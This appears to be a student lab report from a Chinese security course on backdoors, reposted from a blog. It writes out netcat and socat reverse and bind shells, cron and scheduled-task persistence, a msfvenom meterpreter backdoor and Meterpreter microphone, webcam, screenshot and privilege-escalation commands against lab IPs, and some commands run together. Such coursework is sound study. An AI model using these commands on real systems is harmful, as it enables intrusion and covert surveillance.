标签:rev port tab exp reverse 键盘 image har 新建
使用ncat.exe程序监听本机的5307端口ncat.exe -l -p 5307
nc 192.168.1.193 5307 -e /bin/sh成功获得Kali的shell,如下图所示


nc -l -p 5307ncat.exe -e cmd.exe 192.168.1.155 5307
ncat.exe -l -p 5307nc 192.168.1.193 5307
ncat.exe -l 5307 > f_outnc 192.168.1.193 5307 < f_in
crontab -e指令编辑一条定时任务,选择编辑器时选择"3",在底行插入,意思是在每个小时的第10分钟反向连接Windows主机的5307端口

socat [options] <address> <address>,其中两个ddress是必选项,而options是可选项。- ocat的基本功能就是建立两个双向的字节流,数据就在其间传输,参数address就是代表了其中的一个方向。所谓流,代表了数据的流向,而数据则可以有许多不同的类型,命令中也就相应需要许多选项对各种不同的类型数据流进行限定与说明。在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5307 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5307,同时把cmd.exe的stderr重定向到stdout上
创建完成之后,到指定时间时,可以发现之前创建的任务已经开始运行:

socat tcp:192.168.1.193:5307,此时可以发现已经成功获得了一个cmd shell:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.155 LPORT=5307 -f exe > 20165307_backdoor.exe(IP为kali的IP)生成后门程序20165307_backdoor.exencat.exe -lv 5307 > 20165307_backdoor.exe查看连接状态nc 192.168.1.193 5307 < 20165307_backdoor.exe(此处的IP为Windows的IP)将生成的后门程序传送到Windows主机上
在Kali上使用msfconsole指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口
20165307_backdoor.exe此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell:

record_mic指令可以截获一段音频webcam_snap指令可以使用摄像头进行拍照screenshot指令可以进行截屏

getuid指令查看当前用户,使用getsystem指令进行提权(1)例举你能想到的一个后门进入到你系统中的可能方式?
(2)例举你知道的后门如何启动起来(win及linux)的方式?
(3)Meterpreter有哪些给你映像深刻的功能?
(4)如何发现自己有系统有没有被安装后门?
2018-2019-2 20165307《网络对抗技术》Exp2 后门原理与实践
标签:rev port tab exp reverse 键盘 image har 新建
原文地址:https://www.cnblogs.com/wangzhe1998/p/10584139.html